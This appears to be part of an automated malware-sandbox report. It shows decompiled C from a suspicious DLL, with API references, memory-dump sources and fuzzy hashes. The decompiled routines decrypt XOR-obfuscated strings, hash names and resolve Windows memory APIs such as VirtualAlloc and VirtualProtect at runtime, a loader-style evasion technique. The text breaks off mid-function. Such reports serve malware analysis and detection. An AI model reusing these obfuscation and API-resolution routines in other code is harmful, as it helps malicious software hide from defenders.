                				intOrPtr _v32;
                				intOrPtr _v36;
                				char _v40;
                				char _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				intOrPtr _v56;
                				char _v60;
                				char _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				intOrPtr _v76;
                				char _v80;
                				char _v84;
                				intOrPtr _v88;
                				char _v92;
                				CHAR* _v96;
                				intOrPtr* _v100;
                				intOrPtr* _t87;
                				char _t88;
                				intOrPtr _t91;
                				intOrPtr* _t93;
                				struct HINSTANCE__* _t94;
                				signed int _t96;
                				signed int _t102;
                				signed int _t108;
                				signed int _t114;
                				signed int _t117;
                				signed int _t119;
                				signed int _t123;
                				signed char _t127;
                				signed char _t128;
                				signed char _t130;
                				signed char _t131;
                				signed char _t132;
                				signed char _t133;
                				intOrPtr* _t134;
                				intOrPtr _t136;
                				signed int _t140;
                				signed int _t142;
                				signed int _t145;
                				signed int _t146;
                				signed int _t148;
                				signed int _t157;
                				signed int _t158;
                				signed int _t159;
                				intOrPtr* _t167;
                				intOrPtr* _t169;
                				intOrPtr* _t170;
                				intOrPtr* _t172;
                				signed int _t173;
                				intOrPtr* _t175;
                				signed int _t176;
                				intOrPtr* _t177;
                				signed int _t178;
                				signed int _t186;
                				void* _t188;
                
                				_t188 = (_t186 & 0xfffffff8) - 0x64;
                				_t134 = 0x6ea94180;
                				_v92 = 0xf;
                				_v100 = 0x6ea94180;
                				do {
                					_t127 =  *_t134;
                					_t87 = _t134 + 0x100;
                					_t157 = 0;
                					_v96 = _t87;
                					_t172 = _t134;
                					if(_t127 != 0) {
                						do {
                							_t5 = _t127 + 0x20; // 0x20
                							_t172 = _t172 + 1;
                							_t123 = _t127 & 0x000000ff;
                							_t127 =  *_t172;
                							_t156 =  >=  ? _t123 : _t5 & 0x000000ff;
                							_t124 =  >=  ? _t123 : _t5 & 0x000000ff;
                							_t157 = _t157 * 0x00000101 + ( >=  ? _t123 : _t5 & 0x000000ff) ^ ( >=  ? _t123 : _t5 & 0x000000ff) << 0x00000010;
                						} while (_t127 != 0);
                						_t87 = _v96;
                					}
                					_t128 =  *_t87;
                					_t173 = 0;
                					_t167 = _t87;
                					if(_t128 != 0) {
                						asm("o16 nop [eax+eax]");
                						do {
                							_t8 = _t128 + 0x20; // 0x20
                							_t167 = _t167 + 1;
                							_t119 = _t128 & 0x000000ff;
                							_t128 =  *_t167;
                							_t154 =  >=  ? _t119 : _t8 & 0x000000ff;
                							_t120 =  >=  ? _t119 : _t8 & 0x000000ff;
                							_t173 = _t173 * 0x00000101 + ( >=  ? _t119 : _t8 & 0x000000ff) ^ ( >=  ? _t119 : _t8 & 0x000000ff) << 0x00000010;
                						} while (_t128 != 0);
                					}
                					_t88 = E6EA528D0(_t173, _t157);
                					if(_t88 == 0) {
                						_v84 = _t88;
                						_v80 = 0x215e9a10;
                						_v76 = 0x375d9c10;
                						_v72 = 0x446873d;
                						_v68 = 0x453ff55c;
                						if(_v84 == 0) {
                							_t117 = 0;
                							do {
                								 *(_t188 + 0x24 + _t117 * 4) =  *(_t188 + 0x24 + _t117 * 4) ^ 0x453ff55c;
                								_t117 = _t117 + 1;
                							} while (_t117 < 4);
                						}
                						_t130 = _v80;
                						_t175 =  &_v80;
                						_t158 = 0;
                						while(_t130 != 0) {
                							_t25 = _t130 + 0x20; // 0x215e9a30
                							_t175 = _t175 + 1;
                							_t114 = _t130 & 0x000000ff;
                							_t130 =  *_t175;
                							_t150 =  >=  ? _t114 : _t25 & 0x000000ff;
                							_t115 =  >=  ? _t114 : _t25 & 0x000000ff;
                							_t158 = _t158 * 0x00000101 + ( >=  ? _t114 : _t25 & 0x000000ff) ^ ( >=  ? _t114 : _t25 & 0x000000ff) << 0x00000010;
                						}
                						_v64 = 0;
                						_v60 = 0x41f5d866;
                						_v56 = 0x3d94d168;
                						_v52 = 0x43ebd903;
                						_v48 = 0xfa79d2d;
                						if(_v64 == 0) {
                							_t148 = 0;
                							do {
                								 *(_t188 + 0x38 + _t148 * 4) =  *(_t188 + 0x38 + _t148 * 4) ^ 0x0fa79d2d;
                								_t148 = _t148 + 1;
                							} while (_t148 < 4);
                						}
                						_t131 = _v60;
                						_t169 =  &_v60;
                						_t176 = 0;
                						while(_t131 != 0) {
                							_t146 = _t131 + 0x00000020 & 0x000000ff;
                							_t169 = _t169 + 1;
                							_t108 = _t131 & 0x000000ff;
                							_t131 =  *_t169;
                							_t147 =  >=  ? _t108 : _t146;
                							_t109 =  >=  ? _t108 : _t146;
                							_t176 = _t176 * 0x00000101 + ( >=  ? _t108 : _t146) ^ ( >=  ? _t108 : _t146) << 0x00000010;
                						}
                						_t91 = E6EA528D0(_t176, _t158);
                						_v44 = 0;
                						_v40 = 0x59c0b6da;
                						_v36 = 0x48d7bcef;
                						_v32 = 0x6cc6b7f9;
                						_v28 = 0x9b4a0ee;
                						_v88 = _t91;
                						if(_v44 == 0) {
                							_t145 = 0;
                							asm("o16 nop [eax+eax]");
                							do {
                								 *(_t188 + 0x4c + _t145 * 4) =  *(_t188 + 0x4c + _t145 * 4) ^ 0x09b4d39d;
                								_t145 = _t145 + 1;
                							} while (_t145 < 4);
                						}
                						_t132 = _v40;
                						_t177 =  &_v40;
                						_t159 = 0;
                						while(_t132 != 0) {
                							_t60 = _t132 + 0x20; // 0x59c0b6fa
                							_t177 = _t177 + 1;
                							_t102 = _t132 & 0x000000ff;
                							_t132 =  *_t177;
                							_t144 =  >=  ? _t102 : _t60 & 0x000000ff;
                							_t103 =  >=  ? _t102 : _t60 & 0x000000ff;
                							_t159 = _t159 * 0x00000101 + ( >=  ? _t102 : _t60 & 0x000000ff) ^ ( >=  ? _t102 : _t60 & 0x000000ff) << 0x00000010;
                						}
                						_v24 = 0;
                						_v20 = 0x24572e4f;
                						_v16 = 0x58362741;
                						_v12 = 0x26492f2a;
                						_v8 = 0x6a056b04;
                						if(_v24 == 0) {
                							_t142 = 0;
                							do {
                								 *(_t188 + 0x60 + _t142 * 4) =  *(_t188 + 0x60 + _t142 * 4) ^ 0x6a056b04;
                								_t142 = _t142 + 1;
                							} while (_t142 < 4);
                						}
                						_t133 = _v20;
                						_t170 =  &_v20;
                						_t178 = 0;
                						while(_t133 != 0) {
                							_t140 = _t133 + 0x00000020 & 0x000000ff;
                							_t170 = _t170 + 1;
                							_t96 = _t133 & 0x000000ff;
                							_t133 =  *_t170;
                							_t141 =  >=  ? _t96 : _t140;
                							_t97 =  >=  ? _t96 : _t140;
                							_t178 = _t178 * 0x00000101 + ( >=  ? _t96 : _t140) ^ ( >=  ? _t96 : _t140) << 0x00000010;
                						}
                						_t93 = E6EA528D0(_t178, _t159);
                						_t94 = LoadLibraryA(_v96);
                						_t88 =  *_t93(_t94, _v100);
                					}
                					_t136 = _v100;
                					 *((intOrPtr*)(_t136 + 0x200)) = _t88;
                					_t134 = _t136 + 0x204;
                					_t84 =  &_v92;
                					 *_t84 = _v92 - 1;
                					_v100 = _t134;
                				} while ( *_t84 != 0);
                				return _t88;
                			}

                APIs
                • LoadLibraryA.KERNELBASE(0000000F), ref: 6EA52CD6
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: LibraryLoad
                • String ID: */I&$A'6X$O.W$$VirtualAlloc
                • API String ID: 1029625771-4117336556
                • Opcode ID: 0a41dcce04e699e702cac102067ef36450af0aa17eff7209afc6ca0f5b7aac4b
                • Instruction ID: ec2a688c74748cebee10e8dfacf1ebbe45163bea2064fbe878ca74c37cb12cac
                • Opcode Fuzzy Hash: 0a41dcce04e699e702cac102067ef36450af0aa17eff7209afc6ca0f5b7aac4b
                • Instruction Fuzzy Hash: 778103716493918FD304DF3480603ABBBF6AF86344F49096DE8C19B282D775D899CB96
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E6EA5824D() {
                				signed int _t20;
                				signed int _t22;
                				long _t23;
                				signed char _t25;
                				void* _t28;
                				signed int _t31;
                				void* _t33;
                
                				_t31 = 0;
                				do {
                					_t20 = _t31 & 0x0000003f;
                					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x6ea93f20 + (_t31 >> 6) * 4));
                					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
                						 *(_t33 + 0x28) = 0x81;
                						_t22 = _t31;
                						if(_t22 == 0) {
                							_push(0xfffffff6);
                						} else {
                							if(_t22 == 1) {
                								_push(0xfffffff5);
                							} else {
                								_push(0xfffffff4);
                							}
                						}
                						_pop(_t23);
                						_t28 = GetStdHandle(_t23);
                						if(_t28 == 0xffffffff || _t28 == 0) {
                							_t25 = 0;
                						} else {
                							_t25 = GetFileType(_t28); // executed
                						}
                						if(_t25 == 0) {
                							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                							 *(_t33 + 0x18) = 0xfffffffe;
                							_t20 =  *0x6ea94144; // 0xf89d08
                							if(_t20 != 0) {
                								_t20 =  *(_t20 + _t31 * 4);
                								 *(_t20 + 0x10) = 0xfffffffe;
                							}
                						} else {
                							_t20 = _t25 & 0x000000ff;
                							 *(_t33 + 0x18) = _t28;
                							if(_t20 != 2) {
                								if(_t20 == 3) {
                									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
                								}
                							} else {
                								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                							}
                						}
                					} else {
                						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
                					}
                					_t31 = _t31 + 1;
                				} while (_t31 != 3);
                				return _t20;
                			}

                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 6EA58299
                • GetFileType.KERNELBASE(00000000), ref: 6EA582AB
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: FileHandleType
                • String ID:
                • API String ID: 3000768030-0
                • Opcode ID: 6a44146110a5261ec7d45056ccb01fa908f9e4014f9a4f4746416b83d6c03ce7
                • Instruction ID: d6e531706fb0d3851522c145948439347c4a3a310a7d4c20a676cd2565743589
                • Opcode Fuzzy Hash: 6a44146110a5261ec7d45056ccb01fa908f9e4014f9a4f4746416b83d6c03ce7
                • Instruction Fuzzy Hash: F911B771624F528AD7604DBF8C9871ABE94A747230B380F39D1B6D63E1C630D8D6C54C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA55D2F(void* __eax, void* __ebx, void* __edx) {
                
                				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
                			}

                APIs
                  • Part of subcall function 6EA57BBF: GetEnvironmentStringsW.KERNEL32 ref: 6EA57BC8
                  • Part of subcall function 6EA57BBF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6EA57BEB
                  • Part of subcall function 6EA57BBF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6EA57C11
                  • Part of subcall function 6EA57BBF: _free.LIBCMT ref: 6EA57C24
                  • Part of subcall function 6EA57BBF: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EA57C33
                • _free.LIBCMT ref: 6EA55D6F
                • _free.LIBCMT ref: 6EA55D76
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 400815659-0
                • Opcode ID: 1e5d4fdadd50294ec112c2332528fb8f86b87e1673354b70edd4b9ccf8811ef9
                • Instruction ID: ba67990607ffec161a8091002d5a4ae84bdbcdf81674f804b7b8437a1fa22455
                • Opcode Fuzzy Hash: 1e5d4fdadd50294ec112c2332528fb8f86b87e1673354b70edd4b9ccf8811ef9
                • Instruction Fuzzy Hash: 16E0E523955D100B962196FEA84C28A16585F83339B26476AE864DB3C1EF7488EB009D
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 98%
                			E6EA51000(void* __edi) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				char _v28;
                				char _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				char _v52;
                				char _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				char _v76;
                				char _v80;
                				intOrPtr _v84;
                				intOrPtr _v88;
                				intOrPtr _v92;
                				char _v96;
                				char _v100;
                				intOrPtr _v104;
                				intOrPtr _v108;
                				intOrPtr _v112;
                				char _v116;
                				char _v120;
                				intOrPtr _v124;
                				intOrPtr _v128;
                				intOrPtr _v132;
                				char _v136;
                				char _v140;
                				intOrPtr _v144;
                				intOrPtr _v148;
                				intOrPtr _v152;
                				char _v156;
                				char _v160;
                				intOrPtr _v164;
                				intOrPtr _v168;
                				intOrPtr _v172;
                				char _v176;
                				char _v180;
                				intOrPtr _v184;
                				intOrPtr _v188;
                				intOrPtr _v192;
                				char _v196;
                				char _v200;
                				intOrPtr _v204;
                				intOrPtr _v208;
                				intOrPtr _v212;
                				char _v216;
                				char _v220;
                				intOrPtr _v224;
                				intOrPtr _v228;
                				intOrPtr _v232;
                				char _v236;
                				char _v240;
                				intOrPtr _v244;
                				intOrPtr _v248;
                				intOrPtr _v252;
                				char _v256;
                				char _v260;
                				intOrPtr _v264;
                				intOrPtr _v268;
                				intOrPtr _v272;
                				char _v276;
                				char _v280;
                				intOrPtr _v284;
                				intOrPtr _v288;
                				intOrPtr _v292;
                				char _v296;
                				char _v300;
                				intOrPtr _v304;
                				intOrPtr _v308;
                				intOrPtr _v312;
                				char _v316;
                				char _v320;
                				intOrPtr _v324;
                				intOrPtr _v328;
                				intOrPtr _v332;
                				char _v336;
                				char _v340;
                				intOrPtr _v344;
                				intOrPtr _v348;
                				intOrPtr _v352;
                				char _v356;
                				char _v360;
                				intOrPtr _v364;
                				intOrPtr _v368;
                				intOrPtr _v372;
                				char _v376;
                				char _v380;
                				intOrPtr _v384;
                				intOrPtr _v388;
                				intOrPtr _v392;
                				char _v396;
                				char _v400;
                				intOrPtr _v404;
                				intOrPtr _v408;
                				intOrPtr _v412;
                				char _v416;
                				char _v420;
                				intOrPtr _v424;
                				intOrPtr _v428;
                				intOrPtr _v432;
                				char _v436;
                				char _v440;
                				intOrPtr _v444;
                				intOrPtr _v448;
                				intOrPtr _v452;
                				char _v456;
                				char _v460;
                				intOrPtr _v464;
                				intOrPtr _v468;
                				intOrPtr _v472;
                				char _v476;
                				char _v480;
                				intOrPtr _v484;
                				intOrPtr _v488;
                				intOrPtr _v492;
                				char _v496;
                				char _v500;
                				intOrPtr _v504;
                				intOrPtr _v508;
                				intOrPtr _v512;
                				char _v516;
                				char _v520;
                				intOrPtr _v524;
                				intOrPtr _v528;
                				char _v532;
                				char _v536;
                				intOrPtr _v540;
                				intOrPtr _v544;
                				char _v548;
                				char _v552;
                				intOrPtr _v556;
                				intOrPtr _v560;
                				char _v564;
                				char _v568;
                				intOrPtr _v572;
                				intOrPtr _v576;
                				char _v580;
                				char _v584;
                				intOrPtr _v588;
                				intOrPtr _v592;
                				char _v596;
                				char _v600;
                				char* _t513;
                				char* _t514;
                				char* _t518;
                				char* _t519;
                				char* _t523;
                				char* _t524;
                				char* _t528;
                				char* _t529;
                				char* _t533;
                				char* _t534;
                				char* _t538;
                				char* _t539;
                				char* _t543;
                				char* _t544;
                				char* _t548;
                				char* _t549;
                				char* _t553;
                				char* _t554;
                				char* _t558;
                				char* _t559;
                				char* _t563;
                				char* _t564;
                				char* _t568;
                				char* _t569;
                				char* _t573;
                				char* _t574;
                				char* _t578;
                				char* _t579;
                				char* _t583;
                				char* _t584;
                				void* _t705;
                				void* _t707;
                				void* _t709;
                				void* _t711;
                				void* _t713;
                				void* _t715;
                				void* _t717;
                				void* _t719;
                				void* _t721;
                				void* _t723;
                				void* _t725;
                				void* _t727;
                				void* _t729;
                				void* _t731;
                				void* _t733;
                				void* _t735;
                				void* _t737;
                				void* _t739;
                				void* _t741;
                				void* _t743;
                				void* _t745;
                				void* _t747;
                				void* _t749;
                				void* _t751;
                				void* _t753;
                				void* _t755;
                				void* _t757;
                				void* _t759;
                				void* _t761;
                				void* _t763;
                				signed int _t765;
                				signed int _t766;
                				signed int _t767;
                				signed int _t768;
                				signed int _t769;
                				signed int _t770;
                				signed int _t771;
                				signed int _t772;
                				signed int _t773;
                				signed int _t774;
                				signed int _t775;
                				signed int _t776;
                				signed int _t777;
                				signed int _t778;
                				signed int _t779;
                				signed int _t780;
                				signed int _t781;
                				signed int _t782;
                				signed int _t783;
                				signed int _t784;
                				signed int _t785;
                				signed int _t786;
                				signed int _t787;
                				signed int _t788;
                				signed int _t789;
                				signed int _t790;
                				signed int _t791;
                				signed int _t792;
                				signed int _t793;
                				signed int _t794;
                				void* _t795;
                				signed int _t796;
                				void* _t798;
                				void* _t799;
                				void* _t800;
                				void* _t801;
                				void* _t802;
                				void* _t803;
                				void* _t804;
                				void* _t805;
                				void* _t806;
                				void* _t807;
                				void* _t808;
                				void* _t809;
                				void* _t810;
                				void* _t811;
                				void* _t812;
                				void* _t813;
                
                				_t795 = __edi;
                				_t798 = (_t796 & 0xfffffff8) - 0x258;
                				_v500 = 0;
                				_v496 = 0x1e388d85;
                				_v492 = 0x6259848b;
                				_v488 = 0x3c06ace0;
                				_v484 = 0x506ac8ce;
                				if(_v500 == 0) {
                					_t794 = 0;
                					do {
                						 *(_t798 + 0x6c + _t794 * 4) =  *(_t798 + 0x6c + _t794 * 4) ^ 0x506ac8ce;
                						_t794 = _t794 + 1;
                					} while (_t794 < 4);
                				}
                				_v520 = 0;
                				_v516 = 0x4ac2813d;
                				_v512 = 0x7fdc891e;
                				_v508 = 0x5ddf8407;
                				_v504 = 0x3eb0e86b;
                				if(_v520 == 0) {
                					_t793 = 0;
                					asm("o16 nop [eax+eax]");
                					do {
                						 *(_t798 + 0x58 + _t793 * 4) =  *(_t798 + 0x58 + _t793 * 4) ^ 0x3eb0e86b;
                						_t793 = _t793 + 1;
                					} while (_t793 < 4);
                				}
                				E6EA54050(_t795, "VirtualAlloc", 0, 0x200);
                				_t705 = 0;
                				 *0x6ea94380 = 0;
                				_t799 = _t798 + 0xc;
                				_t513 =  &_v516;
                				if(_v516 != 0) {
                					do {
                						_t513 = _t513 + 1;
                						_t705 = _t705 + 1;
                					} while ( *_t513 != 0);
                				}
                				_t706 = _t705 + 1;
                				if(_t705 + 1 != 0) {
                					E6EA54940("VirtualAlloc",  &_v516, _t706);
                					_t799 = _t799 + 0xc;
                				}
                				_t707 = 0;
                				_t514 =  &_v496;
                				if(_v496 != 0) {
                					do {
                						_t514 = _t514 + 1;
                						_t707 = _t707 + 1;
                					} while ( *_t514 != 0);
                				}
                				_t708 = _t707 + 1;
                				if(_t707 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v496, _t708);
                					_t799 = _t799 + 0xc;
                				}
                				_v460 = 0;
                				_v456 = 0x6c6bb2de;
                				_v452 = 0x100abbd0;
                				_v448 = 0x4e5593bb;
                				_v444 = 0x2239f795;
                				if(_v460 == 0) {
                					_t792 = 0;
                					do {
                						 *(_t799 + 0x94 + _t792 * 4) =  *(_t799 + 0x94 + _t792 * 4) ^ 0x2239f795;
                						_t792 = _t792 + 1;
                					} while (_t792 < 4);
                				}
                				_v480 = 0;
                				_v476 = 0x66d72535;
                				_v472 = 0x42c92d16;
                				_v468 = 0x77d12311;
                				_v464 = 0x12a53800;
                				if(_v480 == 0) {
                					_t791 = 0;
                					asm("o16 nop [eax+eax]");
                					do {
                						 *(_t799 + 0x80 + _t791 * 4) =  *(_t799 + 0x80 + _t791 * 4) ^ 0x12a54c63;
                						_t791 = _t791 + 1;
                					} while (_t791 < 4);
                				}
                				E6EA54050(_t795, "VirtualProtect", 0, 0x200);
                				_t709 = 0;
                				 *0x6ea94584 = 0;
                				_t800 = _t799 + 0xc;
                				_t518 =  &_v476;
                				if(_v476 != 0) {
                					do {
                						_t518 = _t518 + 1;
                						_t709 = _t709 + 1;
                					} while ( *_t518 != 0);
                				}
                				_t710 = _t709 + 1;
                				if(_t709 + 1 != 0) {
                					E6EA54940("VirtualProtect",  &_v476, _t710);
                					_t800 = _t800 + 0xc;
                				}
                				_t711 = 0;
                				_t519 =  &_v456;
                				if(_v456 != 0) {
                					do {
                						_t519 = _t519 + 1;
                						_t711 = _t711 + 1;
                					} while ( *_t519 != 0);
                				}
                				_t712 = _t711 + 1;
                				if(_t711 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v456, _t712);
                					_t800 = _t800 + 0xc;
                				}
                				_v420 = 0;
                				_v416 = 0x6f65900d;
                				_v412 = 0x13049903;
                				_v408 = 0x4d5bb168;
                				_v404 = 0x2137d546;
                				if(_v420 == 0) {
                					_t790 = 0;
                					do {
                						 *(_t800 + 0xbc + _t790 * 4) =  *(_t800 + 0xbc + _t790 * 4) ^ 0x2137d546;
                						_t790 = _t790 + 1;
                					} while (_t790 < 4);
                				}
                				_v440 = 0;
                				_v436 = 0x7fdf3e65;
                				_v432 = 0x5ac13646;
                				_v428 = 0x72df3246;
                				_v424 = 0xbad5733;
                				if(_v440 == 0) {
                					_t789 = 0;
                					do {
                						 *(_t800 + 0xa8 + _t789 * 4) =  *(_t800 + 0xa8 + _t789 * 4) ^ 0x0bad5733;
                						_t789 = _t789 + 1;
                					} while (_t789 < 4);
                				}
                				E6EA54050(_t795, "VirtualQuery", 0, 0x200);
                				_t713 = 0;
                				 *0x6ea94788 = 0;
                				_t801 = _t800 + 0xc;
                				_t523 =  &_v436;
                				if(_v436 != 0) {
                					asm("o16 nop [eax+eax]");
                					do {
                						_t523 = _t523 + 1;
                						_t713 = _t713 + 1;
                					} while ( *_t523 != 0);
                				}
                				_t714 = _t713 + 1;
                				if(_t713 + 1 != 0) {
                					E6EA54940("VirtualQuery",  &_v436, _t714);
                					_t801 = _t801 + 0xc;
                				}
                				_t715 = 0;
                				_t524 =  &_v416;
                				if(_v416 != 0) {
                					do {
                						_t524 = _t524 + 1;
                						_t715 = _t715 + 1;
                					} while ( *_t524 != 0);
                				}
                				_t716 = _t715 + 1;
                				if(_t715 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v416, _t716);
                					_t801 = _t801 + 0xc;
                				}
                				_v400 = 0;
                				_v396 = 0x5a37a1c6;
                				_v392 = 0x2656a8c8;
                				_v388 = 0x780980a3;
                				_v384 = 0x1465e48d;
                				if(_v400 == 0) {
                					_t788 = 0;
                					do {
                						 *(_t801 + 0xd0 + _t788 * 4) =  *(_t801 + 0xd0 + _t788 * 4) ^ 0x1465e48d;
                						_t788 = _t788 + 1;
                					} while (_t788 < 4);
                				}
                				_v600 = 0;
                				_v596 = 0x2ce08ffd;
                				_v592 = 0x1efe87de;
                				_v588 = 0x58f783d9;
                				if(_v600 == 0) {
                					_t787 = 0;
                					do {
                						 *(_t801 + 8 + _t787 * 4) =  *(_t801 + 8 + _t787 * 4) ^ 0x5892e6ab;
                						_t787 = _t787 + 1;
                					} while (_t787 < 3);
                				}
                				E6EA54050(_t795, "VirtualFree", 0, 0x200);
                				_t717 = 0;
                				 *0x6ea9498c = 0;
                				_t802 = _t801 + 0xc;
                				_t528 =  &_v596;
                				if(_v596 != 0) {
                					do {
                						_t528 = _t528 + 1;
                						_t717 = _t717 + 1;
                					} while ( *_t528 != 0);
                				}
                				_t718 = _t717 + 1;
                				if(_t717 + 1 != 0) {
                					E6EA54940("VirtualFree",  &_v596, _t718);
                					_t802 = _t802 + 0xc;
                				}
                				_t719 = 0;
                				_t529 =  &_v396;
                				if(_v396 != 0) {
                					do {
                						_t529 = _t529 + 1;
                						_t719 = _t719 + 1;
                					} while ( *_t529 != 0);
                				}
                				_t720 = _t719 + 1;
                				if(_t719 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v396, _t720);
                					_t802 = _t802 + 0xc;
                				}
                				_v360 = 0;
                				_v356 = 0x69c05ff6;
                				_v352 = 0x15a156f8;
                				_v348 = 0x4bfe7e93;
                				_v344 = 0x27921abd;
                				if(_v360 == 0) {
                					_t786 = 0;
                					do {
                						 *(_t802 + 0xf8 + _t786 * 4) =  *(_t802 + 0xf8 + _t786 * 4) ^ 0x27921abd;
                						_t786 = _t786 + 1;
                					} while (_t786 < 4);
                				}
                				_v380 = 0;
                				_v376 = 0x7d0b81bc;
                				_v372 = 0x481c8b89;
                				_v368 = 0x48379788;
                				_v364 = 0x2d7f949a;
                				if(_v380 == 0) {
                					_t785 = 0;
                					do {
                						 *(_t802 + 0xe4 + _t785 * 4) =  *(_t802 + 0xe4 + _t785 * 4) ^ 0x2d7fe4fb;
                						_t785 = _t785 + 1;
                					} while (_t785 < 4);
                				}
                				E6EA54050(_t795, "GetProcessHeap", 0, 0x200);
                				_t721 = 0;
                				 *0x6ea94b90 = 0;
                				_t803 = _t802 + 0xc;
                				_t533 =  &_v376;
                				if(_v376 != 0) {
                					do {
                						_t533 = _t533 + 1;
                						_t721 = _t721 + 1;
                					} while ( *_t533 != 0);
                				}
                				_t722 = _t721 + 1;
                				if(_t721 + 1 != 0) {
                					E6EA54940("GetProcessHeap",  &_v376, _t722);
                					_t803 = _t803 + 0xc;
                				}
                				_t723 = 0;
                				_t534 =  &_v356;
                				if(_v356 != 0) {
                					do {
                						_t534 = _t534 + 1;
                						_t723 = _t723 + 1;
                					} while ( *_t534 != 0);
                				}
                				_t724 = _t723 + 1;
                				if(_t723 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v356, _t724);
                					_t803 = _t803 + 0xc;
                				}
                				_v340 = 0;
                				_v336 = 0x4aca7adf;
                				_v332 = 0x36ab73d1;
                				_v328 = 0x68f45bba;
                				_v324 = 0x4983f94;
                				if(_v340 == 0) {
                					_t784 = 0;
                					do {
                						 *(_t803 + 0x10c + _t784 * 4) =  *(_t803 + 0x10c + _t784 * 4) ^ 0x04983f94;
                						_t784 = _t784 + 1;
                					} while (_t784 < 4);
                				}
                				_v584 = 0;
                				_v580 = 0x19780b04;
                				_v576 = 0x675020d;
                				_v572 = 0x69196e2f;
                				if(_v584 == 0) {
                					_t783 = 0;
                					do {
                						 *(_t803 + 0x18 + _t783 * 4) =  *(_t803 + 0x18 + _t783 * 4) ^ 0x69196e4c;
                						_t783 = _t783 + 1;
                					} while (_t783 < 3);
                				}
                				E6EA54050(_t795, "HeapAlloc", 0, 0x200);
                				_t725 = 0;
                				 *0x6ea94d94 = 0;
                				_t804 = _t803 + 0xc;
                				_t538 =  &_v580;
                				if(_v580 != 0) {
                					do {
                						_t538 = _t538 + 1;
                						_t725 = _t725 + 1;
                					} while ( *_t538 != 0);
                				}
                				_t726 = _t725 + 1;
                				if(_t725 + 1 != 0) {
                					E6EA54940("HeapAlloc",  &_v580, _t726);
                					_t804 = _t804 + 0xc;
                				}
                				_t727 = 0;
                				_t539 =  &_v336;
                				if(_v336 != 0) {
                					do {
                						_t539 = _t539 + 1;
                						_t727 = _t727 + 1;
                					} while ( *_t539 != 0);
                				}
                				_t728 = _t727 + 1;
                				if(_t727 + 1 != 0) {
                					E6EA54940("KERNEL32.dll",  &_v336, _t728);
                					_t804 = _t804 + 0xc;
                				}
                				_v320 = 0;
                				_v316 = 0x7921e6b7;
                				_v312 = 0x540efb9;
                				_v308 = 0x5b1fc7d2;
                				_v304 = 0x3773a3fc;
                				if(_v320 == 0) {
                					_t782 = 0;
                					do {
                						 *(_t804 + 0x120 + _t782 * 4) =  *(_t804 + 0x120 + _t782 * 4) ^ 0x3773a3fc;
                						_t782 = _t782 + 1;
                					} while (_t782 < 4);
                				}
                				_v568 = 0;
                				_v564 = 0x571768c5;
                				_v560 = 0x420c64de;
                				_v556 = 0x27760d8d;
                				if(_v568 == 0) {
                					_t781 = 0;
                					do {
                						 *(_t804 + 0x28 + _t781 * 4) =  *(_t804 + 0x28 + _t781 * 4) ^ 0x27760d8d;
                						_t781 = _t781 + 1;
                					} while (_t781 < 3);
                				}
                				E6EA54050(_t795, "HeapSize", 0, 0x200);
                				_t729 = 0;
                				 *0x6ea94f98 = 0;
                				_t805 = _t804 + 0xc;
                				_t543 =  &_v564;
                				if(_v564 != 0) {
                					do {
                						_t543 = _t543 + 1;
                						_t729 = _t729 + 1;
                					} while ( *_t543 != 0);
                				}
                				_t730 = _t729 + 1;
                				if(_t729 + 1 != 0) {
                					E6EA54940("HeapSize",  &_v564, _t730);
